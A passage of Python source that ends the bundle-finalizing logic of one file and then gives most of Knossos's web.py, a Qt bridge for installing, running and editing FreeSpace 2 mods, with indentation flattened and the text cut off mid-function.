log_bundle_transition(
bundle_uuid=run_state.bundle.uuid,
previous_stage=run_state.stage,
next_stage=RunStage.FINALIZING,
)
return run_state._replace(stage=RunStage.FINALIZING, run_status="Finalizing bundle")
def _transition_from_FINALIZING(self, run_state):
"""
If a full worker cycle has passed since we got into the FINALIZING state we already reported to
server, if bundle is going be sent back to the server, move on to the RESTAGED state. Otherwise,
move on to the FINISHED state. Can also remove bundle_path now.
"""
if run_state.is_restaged:
log_bundle_transition(
bundle_uuid=run_state.bundle.uuid,
previous_stage=run_state.stage,
next_stage=RunStage.RESTAGED,
reason='the bundle is restaged, as `pass-down-termination` is specified for worker',
)
return run_state._replace(stage=RunStage.RESTAGED)
elif run_state.finalized:
if not self.shared_file_system:
remove_path(run_state.bundle_path) # don't remove bundle if shared FS
return run_state._replace(stage=RunStage.FINISHED, run_status='Finished')
else:
return run_state
|
web.py
|
## Copyright 2017 Knossos authors, see NOTICE file
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
from __future__ import absolute_import, print_function
import sys
import os.path
import logging
import re
import json
import platform
import stat
import sqlite3
import shutil
import semantic_version
from threading import Thread
from datetime import datetime
from .qt import QtCore, QtGui, QtWidgets, QtWebChannel, read_file, run_in_qt
from . import center, runner, repo, windows, tasks, util, settings, nebula, clibs
if not QtWebChannel:
from .qt import QtWebKit
else:
class WebSocketWrapper(QtWebChannel.QWebChannelAbstractTransport):
_conn = None
_bridge = None
def __init__(self, conn, bridge):
super(WebSocketWrapper, self).__init__()
self._bridge = bridge
self._bridge._conns.append(self)
self._conn = conn
self._conn.textMessageReceived.connect(self.socketMessageReceived)
self._conn.disconnected.connect(self.socketDisconnected)
def sendMessage(self, msg):
for k, v in msg.items():
if isinstance(v, QtCore.QJsonValue):
msg[k] = v.toVariant()
# print('#-> ', json.dumps(msg))
self._conn.sendTextMessage(json.dumps(msg))
def socketMessageReceived(self, msg):
# print('#<- ', json.loads(msg))
self.messageReceived.emit(json.loads(msg), self)
def socketDisconnected(self):
self._bridge._conns.remove(self)
class WebBridge(QtCore.QObject):
_view = None
_last_upload = None
asyncCbFinished = QtCore.Signal(int, str)
showWelcome = QtCore.Signal()
showDetailsPage = QtCore.Signal('QVariant')
showRetailPrompt = QtCore.Signal()
showLaunchPopup = QtCore.Signal(str)
showModDetails = QtCore.Signal(str)
updateModlist = QtCore.Signal(str, str, list)
modProgress = QtCore.Signal(str, float, str)
retailInstalled = QtCore.Signal()
hidePopup = QtCore.Signal()
applyDevDesc = QtCore.Signal(str)
taskStarted = QtCore.Signal(float, str, list)
taskProgress = QtCore.Signal(float, float, str)
taskFinished = QtCore.Signal(float)
taskMessage = QtCore.Signal(str)
fs2Launching = QtCore.Signal()
fs2Launched = QtCore.Signal()
fs2Quit = QtCore.Signal()
def __init__(self, webView=None):
super(WebBridge, self).__init__()
self._view = webView
def load(self):
if QtWebChannel:
self.bridge = self
page = self._view.page()
self._channel = QtWebChannel.QWebChannel(page)
page.setWebChannel(self._channel)
self._channel.registerObject('fs2mod', self)
if center.DEBUG and os.path.isdir('../html'):
from .qt import QtWebSockets, QtNetwork
if QtWebSockets is None:
logging.warn('Remote mode disabled')
link = 'qrc:///html/index.html'
else:
self._conns = []
self._server = QtWebSockets.QWebSocketServer('Knossos interface', QtWebSockets.QWebSocketServer.NonSecureMode)
if not self._server.listen(QtNetwork.QHostAddress.LocalHost, 4007):
logging.warn('Failed to listen on port 4007!')
else:
self._server.newConnection.connect(self._acceptConnection)
with open('../html/qwebchannel.js', 'w') as hdl:
hdl.write(read_file(':/qtwebchannel/qwebchannel.js'))
link = os.path.abspath('../html/index_debug.html')
if sys.platform == 'win32':
link = '/' + link.replace('\\', '/')
link = 'file://' + link
else:
link = 'qrc:///html/index.html'
self._view.load(QtCore.QUrl(link))
def _acceptConnection(self):
conn = self._server.nextPendingConnection()
self._channel.connectTo(WebSocketWrapper(conn, self))
@QtCore.Slot('QVariantList', result=str)
def finishInit(self, tr_keys):
trs = {}
for k in tr_keys:
trs[k] = QtCore.QCoreApplication.translate('modlist_ts', k)
center.main_win.finish_init()
return json.dumps({
't': trs,
'platform': sys.platform,
'welcome': 'KN_WELCOME' in os.environ or center.settings['base_path'] is None,
'explore_mods': center.main_win.get_explore_mod_list_cache_json()
})
@QtCore.Slot(result=str)
def getVersion(self):
return center.VERSION
@QtCore.Slot(result='QVariantList')
def getMods(self):
return list(center.mods.get())
@QtCore.Slot(result='QVariantList')
def getInstalledMods(self):
return list(center.installed.get())
@QtCore.Slot(result='QVariantMap')
def getUpdates(self):
updates = center.installed.get_updates()
result = {}
for mid, items in updates.items():
versions = result[mid] = {}
for ver_a, ver_b in items.items():
versions[str(ver_a)] = str(ver_b)
return result
@QtCore.Slot(str, str, result=bool)
def isInstalled(self, mid, spec=None):
if spec is None:
return mid in center.installed.mods
else:
spec = util.Spec(spec)
mod = center.installed.mods.get(mid, None)
if mod is None:
return False
return spec.match(mod.version)
@QtCore.Slot(str, str, result='QVariantMap')
def query(self, mid, spec=None):
if spec is not None:
if spec == '':
spec = None
else:
if re.search(r'^\d+', spec):
spec = '==' + spec
try:
spec = util.Spec(spec)
except Exception:
logging.exception('Invalid spec "%s" passed to query()!', spec)
return -2
try:
return center.mods.query(mid, spec).get()
except Exception:
return None
@QtCore.Slot()
def fetchModlist(self):
tasks.run_task(tasks.LoadLocalModsTask())
tasks.run_task(tasks.FetchTask())
@QtCore.Slot(bool, result='QVariantList')
def requestModlist(self, async_=False):
if async_:
center.main_win.update_mod_list()
return [None]
else:
return list(center.main_win.search_mods())
@QtCore.Slot(str)
def showTab(self, name):
try:
center.main_win.update_mod_buttons(name)
except Exception:
logging.exception('Failed to switch tabs!')
@QtCore.Slot(str)
def showMod(self, mid):
# Make sure the mod list is puplated.
try:
center.main_win.update_mod_buttons('explore')
self.showModDetails.emit(mid)
except Exception:
logging.exception('Failed to show mod %s!' % mid)
@QtCore.Slot(str)
def triggerSearch(self, term):
center.main_win.perform_search(term)
def _get_mod(self, mid, spec=None, mod_repo=None):
if spec is not None:
if spec == '':
spec = None
else:
if re.search(r'^\d+', spec):
spec = '==' + spec
try:
spec = util.Spec(spec)
except Exception:
logging.exception('Invalid spec "%s" passed to a web API function!', spec)
return -2
if mod_repo is None:
mod_repo = center.installed
try:
return mod_repo.query(mid, spec)
except repo.ModNotFound:
logging.exception('Couldn\'t find mod "%s" (%s)!', mid, spec)
return -1
@QtCore.Slot(str, str, result=int)
def showAvailableDetails(self, mid, spec=None):
mod = self._get_mod(mid, spec, center.mods)
if mod in (-1, -2):
return mod
self.showDetailsPage.emit(mod.get())
return 0
@QtCore.Slot(str, str, result=int)
def showInstalledDetails(self, mid, spec=None):
mod = self._get_mod(mid, spec)
if mod in (-1, -2):
return mod
self.showDetailsPage.emit(mod.get())
return 0
@QtCore.Slot(str, str, 'QStringList', result=int)
def install(self, mid, spec=None, pkgs=None):
mod = self._get_mod(mid, spec, center.mods)
if mod in (-1, -2):
logging.debug('fs2mod.install(%s, %s) = %d', mid, spec, mod)
return mod
if pkgs is None:
pkgs = []
if mod.parent == 'FS2':
retail = self._get_mod('FS2')
if retail == -1:
self.showRetailPrompt.emit()
return 0
windows.ModInstallWindow(mod, pkgs)
return 0
@QtCore.Slot(str, str, 'QStringList', result=int)
def uninstall(self, mid, spec=None, pkgs=None):
mod = self._get_mod(mid, spec)
if mod in (-1, -2):
return mod
if mod.dev_mode:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr("I can't uninstall this mod because it's in dev mode!"))
return 0
if len(pkgs) == 0:
plist = mod.packages
else:
plist = []
pfound = set()
for pkg in mod.packages:
if pkg.name in pkgs:
plist.append(pkg)
pfound.add(pkg.name)
if len(pfound) < len(pkgs):
# Some packages are missing
pmissing = set(pkgs) - pfound
logging.warning('Missing packages %s.', ', '.join(pmissing))
return -2
titles = [pkg.name for pkg in plist if center.installed.is_installed(pkg)]
# FIXME: Check if any other mod dependes on this mod before uninstalling it to avoid broken dependencies.
deps = center.installed.get_dependents(plist)
if deps:
names = sorted([m.title for m in deps])
msg = self.tr('You can\'t uninstall this because %s still depend on it.') % util.human_list(names)
QtWidgets.QMessageBox.critical(None, 'Knossos', msg)
return False
msg = QtWidgets.QMessageBox()
msg.setIcon(QtWidgets.QMessageBox.Question)
msg.setText(self.tr('Do you really want to uninstall %s?') % (mod.title,))
if len(titles) > 0:
msg.setInformativeText(self.tr('%s will be removed.') % (', '.join(titles)))
msg.setStandardButtons(QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No)
msg.setDefaultButton(QtWidgets.QMessageBox.No)
if msg.exec_() == QtWidgets.QMessageBox.Yes:
tasks.run_task(tasks.UninstallTask(plist, mods=[mod]))
return True
else:
return False
@QtCore.Slot(str, str, result=int)
def updateMod(self, mid, spec=None):
mod = self._get_mod(mid, spec)
if mod in (-1, -2):
return mod
new_rel = center.mods.query(mod.mid)
try:
old_rel = center.mods.query(mod)
except repo.ModNotFound:
old_rel = mod
try:
latest_ins = center.installed.query(mod.mid).version
except repo.ModNotFound:
latest_ins = None
new_opt_pkgs = set([pkg.name for pkg in new_rel.packages if pkg.status in ('recommended', 'optional')])
old_opt_pkgs = set([pkg.name for pkg in old_rel.packages if pkg.status in ('recommended', 'optional')])
sel_pkgs = []
installed_pkgs = [pkg.name for pkg in mod.packages]
for pkg in new_rel.packages:
if pkg.status == 'required' or pkg.name in installed_pkgs:
sel_pkgs.append(pkg)
if new_opt_pkgs - old_opt_pkgs:
for pkg in new_rel.packages:
if pkg.status == 'recommended' and pkg.name not in sel_pkgs:
sel_pkgs.append(pkg)
all_vers = list(center.installed.query_all(mid))
if len(all_vers) == 1 and not mod.dev_mode:
# Only one version is installed, let's update it.
if new_opt_pkgs - old_opt_pkgs:
# There are new recommended or optional packages, we'll have to ask the user.
windows.ModInstallUpdateWindow(new_rel, mod, [p.name for p in sel_pkgs])
else:
if latest_ins == new_rel.version:
# Only metadata changed
tasks.run_task(tasks.RewriteModMetadata([mod]))
else:
tasks.run_task(tasks.UpdateTask(mod, sel_pkgs))
else:
# Just install the new version
if new_opt_pkgs - old_opt_pkgs:
# There are new recommended or optional packages, we'll have to ask the user.
windows.ModInstallWindow(new_rel, [p.name for p in sel_pkgs])
else:
edit = set()
if mod.dev_mode:
edit.add(mod.mid)
if not mod.dev_mode and latest_ins == new_rel.version:
# Only metadata changed
tasks.run_task(tasks.RewriteModMetadata([mod]))
else:
# NOTE: If a dev mod received a metadata update, we have an edge case in which this function doesn't
# do anything.
# * RewriteModMetadata would remove all local changes which is highly undesirable.
# * InstallTask doesn't update the metadata of installed mods (updates which change the version
# number are technically new mods since they use a different folder)
tasks.run_task(tasks.InstallTask(sel_pkgs, new_rel, editable=edit))
return 0
@QtCore.Slot(float)
def abortTask(self, tid):
if hasattr(center.main_win, 'abort_task'):
center.main_win.abort_task(int(tid))
@QtCore.Slot(str, str, result=int)
def runMod(self, mid, spec=None):
mod = self._get_mod(mid, spec)
if mod in (-1, -2):
return mod
runner.run_mod(mod)
return 0
@QtCore.Slot(str, str, result=list)
def getModTools(self, mid, spec):
mod = self._get_mod(mid, spec)
if mod in (-1, -2):
return [mod]
labels = set()
try:
for exe in mod.get_executables(user=True):
if exe.get('label') is not None:
labels.add(exe['label'])
except repo.NoExecutablesFound:
pass
labels = list(labels)
labels.sort()
return labels
@QtCore.Slot(str, str, str, str, str, result=int)
def runModTool(self, mid, spec, tool, tool_spec, label):
mod = self._get_mod(mid, spec)
if mod in (-1, -2):
return mod
if tool == '':
tool = None
else:
tool = self._get_mod(tool, tool_spec)
if tool in (-1, -2):
return mod
if label == '':
label = None
runner.run_mod(mod, tool, label)
return 0
@QtCore.Slot(str, str, str, bool, list)
def runModAdvanced(self, mid, version, exe, is_tool, mod_flag):
mod = self._get_mod(mid, version)
if mod in (-1, -2):
return
runner.run_mod_ex(mod, exe, mod_flag, is_tool)
@QtCore.Slot(str, str, result=int)
def vercmp(self, a, b):
try:
a = semantic_version.Version(a)
b = semantic_version.Version(b)
except Exception:
# logging.exception('Someone passed an invalid version to vercmp()!')
return 0
return a.__cmp__(b)
@QtCore.Slot(str)
def openExternal(self, link):
if ':\\' in link:
link = QtCore.QUrl.fromLocalFile(link)
else:
link = QtCore.QUrl(link)
QtGui.QDesktopServices.openUrl(link)
@QtCore.Slot(str, str, result=str)
def browseFolder(self, title, path):
return QtWidgets.QFileDialog.getExistingDirectory(None, title, path)
@QtCore.Slot(str, str, str, result=list)
def browseFiles(self, title, path, filter_):
res = QtWidgets.QFileDialog.getOpenFileNames(None, title, path, filter_)
if res:
return res[0]
else:
return []
@QtCore.Slot(str, result=str)
def verifyRootVPFolder(self, vp_path):
vp_path_components = os.path.split(vp_path)
if len(vp_path_components) != 2 or vp_path_components[1].lower() != 'root_fs2.vp':
QtWidgets.QMessageBox.critical(
None, 'Knossos', self.tr('The selected path is not to root_fs2.vp!'))
return ''
vp_dir = vp_path_components[0]
if not util.is_fs2_retail_directory(vp_dir):
QtWidgets.QMessageBox.critical(
None, 'Knossos', self.tr('The selected root_fs2.vp\'s folder '
'does not have the FreeSpace 2 files!'))
return ''
return vp_dir
def _filter_out_hidden_files(self, files):
if platform.system() != 'Windows':
return [file for file in files if not file.startswith('.')]
else: # TODO figure out how to identify hidden files on Windows
return files
def _is_program_files_path(self, path):
prog_folders = [os.environ.get('ProgramFiles', 'C:/Program Files'),
os.environ.get('ProgramFiles(x86)', 'C:/Program Files (x86)')]
prog_folders = tuple([f.lower().replace('\\', '/') for f in prog_folders])
return path.lower().replace('\\', '/').startswith(prog_folders)
@QtCore.Slot(str, result=bool)
def setBasePath(self, path):
if os.path.isfile(path):
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('The selected path is not a directory!'))
return False
if platform.system() == 'Windows':
if self._is_program_files_path(path):
result = QtWidgets.QMessageBox.question(None, 'Knossos',
self.tr('Using a folder in "Program Files" for the Knossos '
'library is not recommended, because you will have '
'to always run Knossos as Administrator. Use anyway?'))
if result == QtWidgets.QMessageBox.No:
return False
if os.path.isdir(path):
if os.path.exists(os.path.join(path, center.get_library_json_name())):
logging.info('Knossos library marker file found in selected path')
# TODO log info from JSON file as debug messages?
elif len(self._filter_out_hidden_files(os.listdir(path))) > 0:
result = QtWidgets.QMessageBox.question(None, 'Knossos',
self.tr('Using a non-empty folder for the Knossos library '
'is not recommended, because it can cause problems'
' for Knossos. Use anyway?'))
if result == QtWidgets.QMessageBox.No:
return False
if not os.path.lexists(path):
result = QtWidgets.QMessageBox.question(None, 'Knossos',
self.tr('The selected path does not exist. Should I create the folder?'))
if result == QtWidgets.QMessageBox.Yes:
try:
os.makedirs(path)
except OSError:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr("Failed to create Knossos data folder!"))
return False
else:
return False
else:
vp_path = util.ipath(os.path.join(path, 'root_fs2.vp'))
if os.path.isfile(vp_path):
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr("Please don't use an existing FS2 directory. It won't work! Select an empty directory instead."))
return False
center.settings['base_path'] = os.path.abspath(path)
center.save_settings()
util.ensure_tempdir()
tasks.run_task(tasks.LoadLocalModsTask())
return True
# For when center.installed has not yet been initialized
@QtCore.Slot(result=bool)
def checkIfRetailInstalled(self):
fs2_json_path = os.path.join(center.settings['base_path'], 'FS2', 'mod.json')
return os.path.exists(fs2_json_path)
@QtCore.Slot(int)
def getSettings(self, cb_id):
def cb():
res = settings.get_settings()
self.asyncCbFinished.emit(cb_id, json.dumps(res))
Thread(target=cb).start()
@QtCore.Slot(int)
def getJoysticks(self, cb_id):
def cb():
res = settings.get_joysticks()
self.asyncCbFinished.emit(cb_id, json.dumps(res))
Thread(target=cb).start()
@QtCore.Slot(str, str)
def saveSetting(self, key, value):
try:
value = json.loads(value)
except Exception:
logging.exception('Failed to decode new value for setting "%s"! (%s)' % (key, value))
else:
settings.save_setting(key, value)
@QtCore.Slot(str)
def saveFsoSettings(self, data):
try:
data = json.loads(data)
except Exception:
logging.exception('Failed to decode new FSO settings! (%s)' % data)
else:
center.settings['joystick'] = {
'guid': data.get('joystick_guid', None),
'id': data.get('joystick_id', 99999)
}
center.save_settings()
settings.save_fso_settings(data)
@QtCore.Slot(result=str)
def getDefaultFsoCaps(self):
flags = None
if center.settings['fs2_bin']:
try:
flags = settings.get_fso_flags(center.settings['fs2_bin'])
except Exception:
logging.exception('Failed to fetch FSO flags!')
try:
return json.dumps(flags)
except Exception:
logging.exception('Failed to encode FSO flags!')
@QtCore.Slot(result=str)
def searchRetailData(self):
# Huge thanks go to jr2 for discovering everything implemented here to detect possible FS2 retail installs.
# --ngld
folders = [r'C:\GOG Games\Freespace2', r'C:\Games\Freespace2', r'C:\Games\Freespace 2']
reg = QtCore.QSettings(r'HKEY_CURRENT_USER\Software\Valve\Steam', QtCore.QSettings.NativeFormat)
reg.setFallbacksEnabled(False)
steam_path = reg.value('SteamPath')
if not steam_path:
logging.info('No SteamPath detected!')
else:
steam_config = os.path.join(steam_path, 'config/config.vdf')
if not os.path.isfile(steam_config):
logging.warning('config.vdf is not where I expected it!')
else:
folders.append(os.path.join(steam_path, 'steamapps', 'common', 'Freespace 2'))
with open(steam_config, 'r') as stream:
for m in re.finditer(r'"BaseInstallFolder_[0-9]+"\s+"([^"]+)"', stream.read()):
folders.append(os.path.join(m.group(1), 'Freespace 2'))
for path in (r'HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\GOG.com\GOGFREESPACE2', r'HKEY_LOCAL_MACHINE\SOFTWARE\GOG.com\GOGFREESPACE2'):
reg = QtCore.QSettings(path, QtCore.QSettings.NativeFormat)
reg.setFallbacksEnabled(False)
gog_path = reg.value('PATH')
if gog_path:
folders.append(gog_path)
gog_db = os.path.expandvars(r'%ProgramData%\GOG.com\Galaxy\storage\index.db')
if os.path.isfile(gog_db):
try:
db = sqlite3.connect(gog_db)
c = db.cursor()
c.execute('SELECT localpath FROM Products WHERE productId = 5')
row = c.fetchone()
if row:
folders.append(row[0])
except Exception:
logging.exception('Failed to read GOG index.db!')
gog_db = os.path.expandvars(r'%ProgramData%\GOG.com\Galaxy\storage\galaxy.db')
if os.path.isfile(gog_db):
try:
db = sqlite3.connect(gog_db)
c = db.cursor()
c.execute('SELECT installationPath FROM InstalledBaseProducts WHERE productId = 5')
row = c.fetchone()
if row:
folders.append(row[0])
except Exception:
logging.exception('Failed to read GOG galaxy.db!')
for path in folders:
if util.is_fs2_retail_directory(path):
return path
return ''
@QtCore.Slot(str, result=bool)
def copyRetailData(self, path):
if util.is_fs2_retail_directory(path):
tasks.run_task(tasks.GOGCopyTask(path, os.path.join(center.settings['base_path'], 'FS2')))
return True
elif os.path.isfile(path) and path.endswith('.exe'):
tasks.run_task(tasks.GOGExtractTask(path, os.path.join(center.settings['base_path'], 'FS2')))
return True
elif os.path.isfile(path):
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('The selected path is not a directory and not an installer!'))
return False
else:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('The selected path does not contain the retail files!'))
return False
@QtCore.Slot(result=str)
def getRunningTasks(self):
tasks = center.main_win.get_tasks()
res = {}
for t, task in tasks.items():
res[t] = {
'title': task.title,
'mods': [m.get() for m in task.mods]
}
try:
return json.dumps(res)
except Exception:
logging.exception('Failed to encoding running tasks!')
return 'null'
@QtCore.Slot(str, str, str, str, str, str, result=bool)
def createMod(self, ini_path, name, mid, version, mtype, parent):
if mtype in ('mod', 'ext'):
if parent != 'FS2':
parent = self._get_mod(parent)
if parent == -1:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('The selected parent TC is not valid!'))
return False
else:
parent = parent.mid
else:
parent = None
mod = repo.InstalledMod({
'title': name,
'id': mid,
'version': version,
'type': mtype,
'parent': parent,
'dev_mode': True
})
mod.generate_folder()
if os.path.isdir(mod.folder):
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('There already exists a mod with the chosen ID!'))
return False
exists = False
try:
neb = nebula.NebulaClient()
neb.login()
exists = not neb.check_mod_id(mid, name)
except nebula.InvalidLoginException:
QtWidgets.QMessageBox.warning(None, 'Knossos',
self.tr("Knossos couldn't check if your mod ID is unique because it couldn't connect to the Nebula. " +
"Continue at your own risk if you're sure it is unique, otherwise please abort."))
except Exception:
logging.exception('Failed to contact the nebula!')
QtWidgets.QMessageBox.warning(None, 'Knossos',
self.tr("Knossos couldn't check if your mod ID is unique because it couldn't connect to the Nebula. " +
"Continue at your own risk if you're sure it is unique, otherwise please abort."))
if exists:
QtWidgets.QMessageBox.critical(None, 'Knossos',
self.tr('Your chosen mod ID is already being used by someone else. Please choose a different one.'))
return False
upper_folder = os.path.dirname(mod.folder)
if not os.path.isdir(upper_folder):
if mod.mtype in ('tool', 'engine') and upper_folder.endswith('bin'):
try:
os.mkdir(upper_folder)
except Exception:
logging.exception('Failed to create binary folder! (%s)' % upper_folder)
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('I could not create the folder for binaries!'))
return False
elif mod.mtype == 'tc':
try:
os.mkdir(upper_folder)
except Exception:
logging.exception('Failed to create TC folder! (%s)' % upper_folder)
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('I could not create the folder for the TC!'))
return False
else:
logging.error('%s did not exist during mod creation! (parent = %s)' % (mod.folder, mod.parent))
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('The chosen parent does not exist! Something went very wrong here!!'))
return False
os.mkdir(mod.folder)
if ini_path != '':
# We need the ini mod for determining where to pull the VPs from
ini_mod = repo.IniMod()
ini_mod.load(ini_path)
if len(ini_mod.get_primary_list()) > 0:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr(
'Ini mods with a primary list are currently not supported for importing!'))
return False
# This dict will convert a known secondary list entry to a mod.json style dependency
dependency_mapping = {
"mediavps_2014": {
"id": "MVPS",
"version": "3.7.2",
},
"mediavps_3612": {
"id": "MVPS",
"version": "3.6.12",
},
"mediavps": {
"id": "MVPS",
"version": "3.6.10",
},
}
package_dependencies = []
for dependency in ini_mod.get_secondary_list():
dependency = dependency.lower() # The mapping only works for lower case
if dependency not in dependency_mapping:
# An unknown dependency is just skipped
QtWidgets.QMessageBox.warning(None, 'Knossos',
self.tr(
'The mod.ini dependency %s is not known to Knossos and could not be converted to a mod.json dependency.')
% (dependency))
continue
package_dependencies.append(dependency_mapping[dependency])
task = tasks.VpExtractionTask(mod, ini_mod)
def finish_import():
for vp_file in task.get_results():
base_filename = os.path.basename(vp_file).replace(".vp", "")
pkg = repo.InstalledPackage({
'name': base_filename,
'status': 'required',
'folder': base_filename,
'dependencies': package_dependencies,
'is_vp': True
})
mod.add_pkg(pkg)
center.installed.add_mod(mod)
mod.update_mod_flag()
try:
mod.save()
except Exception:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('Failed to save mod.json!'))
return
center.main_win.update_mod_list()
task.done.connect(finish_import)
tasks.run_task(task)
return True
else:
try:
mod.save()
except Exception:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('Failed to save mod.json!'))
return False
center.installed.add_mod(mod)
center.main_win.update_mod_list()
return True
@QtCore.Slot(str, str, str, str, result=int)
def addPackage(self, mid, version, pkg_name, pkg_folder):
mod = self._get_mod(mid, version)
if mod in (-1, -2):
return mod
if not mod.dev_mode:
QtWidgets.QMessageBox.critical(None, 'Knossos',
self.tr("You can't edit \"%s\" because it isn't in dev mode!") % mod.title)
return -1
pkg = mod.add_pkg(repo.Package({'name': pkg_name}))
pkg.folder = pkg_folder
pkg_path = os.path.join(mod.folder, pkg_folder)
if not os.path.isdir(pkg_path):
os.mkdir(pkg_path)
try:
mod.save()
except Exception:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('Failed to save mod.json!'))
return
center.main_win.update_mod_list()
return len(mod.packages) - 1
@QtCore.Slot(str, str, int, result=bool)
def deletePackage(self, mid, version, idx):
mod = self._get_mod(mid, version)
if mod in (-1, -2):
return False
if idx < 0 or idx >= len(mod.packages):
logging.error('Invalid index passed to deletePackage()!')
return False
if not mod.dev_mode:
QtWidgets.QMessageBox.critical(None, 'Knossos',
self.tr("You can't edit \"%s\" because it isn't in dev mode!") % mod.title)
return False
# TODO: Delete the package folder?
del mod.packages[idx]
try:
mod.save()
except Exception:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('Failed to save mod.json!'))
return False
center.main_win.update_mod_list()
return True
@QtCore.Slot(str, result=str)
def selectImage(self, old_path):
if old_path == '':
old_dir = None
else:
old_dir = os.path.dirname(old_path)
new_path, used_filter = QtWidgets.QFileDialog.getOpenFileName(None, self.tr('Please select an image'), old_dir,
self.tr('Image (*.png *.jpg *.jpeg *.gif *.bmp)'))
if new_path:
return new_path
elif os.path.isfile(old_path):
return old_path
else:
return ''
@QtCore.Slot(str, result=list)
def addPkgExe(self, folder):
if sys.platform == 'win32':
filter_ = self.tr('Executables (*.exe)')
else:
filter_ = '*'
res = QtWidgets.QFileDialog.getOpenFileNames(None, self.tr('Please select one or more executables'),
folder, filter_)
if not res:
return []
else:
return [os.path.relpath(item, folder) for item in res[0]]
@QtCore.Slot(str, result=list)
def findPkgExes(self, folder):
result = []
for path, dirs, files in os.walk(folder):
for fn in files:
fn = os.path.join(path, fn)
if fn.endswith('.exe'):
result.append(fn)
elif '.so' not in fn and os.stat(fn).st_mode & stat.S_IXUSR == stat.S_IXUSR:
result.append(fn)
return [os.path.relpath(item, folder) for item in result]
def _store_mod_images(self, mod, img, imlist):
if isinstance(img, list):
for i, item in enumerate(img):
img[i] = self._store_mod_images(mod, item, imlist)
return img
path = os.path.join(mod.folder, 'kn_images')
if not os.path.isdir(path):
os.mkdir(path)
if os.path.abspath(img).startswith(path):
imlist.add(os.path.basename(img))
return img
name, ext = os.path.splitext(img)
dest = os.path.join(path, util.gen_hash(img)[1] + ext)
logging.debug('Copying image from %s to %s.', img, dest)
shutil.copyfile(img, dest)
imlist.add(os.path.basename(dest))
return dest
def _clean_mod_images(self, mod, images):
path = os.path.join(mod.folder, 'kn_images')
if not os.path.isdir(path):
return
for item in os.listdir(path):
if item not in images:
logging.debug('Removing %s from %s because it is no longer needed.', item, mod)
os.unlink(os.path.join(path, item))
@QtCore.Slot(str, result=bool)
def saveModDetails(self, data):
try:
data = json.loads(data)
except Exception:
logging.exception('Failed to decode mod details!')
QtWidgets.QMessageBox.critical(None, 'Error', self.tr('Internal data inconsistency. Please try again.'))
return False
mod = self._get_mod(data['id'], data['version'])
if mod == -1:
logging.error('Failed find mod "%s" during save!' % data['id'])
QtWidgets.QMessageBox.critical(None, 'Error', self.tr('Failed to find the mod! Weird...'))
return False
if not mod.dev_mode:
QtWidgets.QMessageBox.critical(None, 'Knossos',
self.tr("You can't edit \"%s\" because it isn't in dev mode!") % mod.title)
return False
if mod.mtype == 'engine':
mod.stability = data['stability']
mod.title = data['title']
mod.description = data['description']
imlist = set()
for prop in ('logo', 'tile', 'banner', 'screenshots', 'attachments'):
if data[prop]:
setattr(mod, prop, self._store_mod_images(mod, data[prop], imlist))
elif isinstance(data[prop], list):
setattr(mod, prop, [])
else:
setattr(mod, prop, None)
self._clean_mod_images(mod, imlist)
mod.release_thread = data['release_thread']
mod.videos = []
for line in data['video_urls'].split('\n'):
line = line.strip()
if line != '':
mod.videos.append(line)
if data['first_release']:
try:
mod.first_release = datetime.strptime(data['first_release'], '%Y-%m-%d')
except ValueError:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('The entered first release date is invalid!'))
return False
if data['last_update']:
try:
mod.last_update = datetime.strptime(data['last_update'], '%Y-%m-%d')
except ValueError:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('The entered last update date is invalid!'))
return False
try:
mod.save()
except Exception:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('Failed to save mod.json!'))
return False
center.main_win.update_mod_list()
return True
@QtCore.Slot(str, str, str, str, result=bool)
def savePackage(self, mid, version, pkg_name, data):
try:
data = json.loads(data)
except Exception:
logging.exception('Failed to decode mod details!')
QtWidgets.QMessageBox.critical(None, 'Error', self.tr('Internal data inconsistency. Please try again.'))
return False
mod = self._get_mod(mid, version)
if mod == -1:
logging.error('Failed find mod "%s" during save!' % mid)
QtWidgets.QMessageBox.critical(None, 'Error', self.tr('Failed to find the mod! Weird...'))
return False
if not mod.dev_mode:
QtWidgets.QMessageBox.critical(None, 'Knossos',
self.tr("You can't edit \"%s\" because it isn't in dev mode!") % mod.title)
return False
pkg = None
for item in mod.packages:
if item.name == pkg_name:
pkg = item
break
if not pkg:
logging.error('Failed to find package "%s" for mod "%s"!' % (pkg_name, mid))
QtWidgets.QMessageBox.critical(None, 'Error', self.tr('Failed to find the package! Weird...'))
return False
pkg.notes = data['notes']
pkg.status = data['status']
pkg.dependencies = data['dependencies']
if mod.mtype in ('engine', 'tool'):
pkg.is_vp = False
pkg.environment = data['environment']
pkg.executables = data['executables']
else:
pkg.is_vp = data['is_vp']
pkg.environment = None
pkg.executables = []
# Normalize
pkg.set(pkg.get())
mod.update_mod_flag()
try:
mod.save()
except Exception:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('Failed to save mod.json!'))
return False
center.main_win.update_mod_list()
return True
@QtCore.Slot(str, str, str, str, result=bool)
def saveModFsoDetails(self, mid, version, build, cmdline):
mod = self._get_mod(mid, version)
if mod == -1:
logging.error('Failed find mod "%s" during save!' % mid)
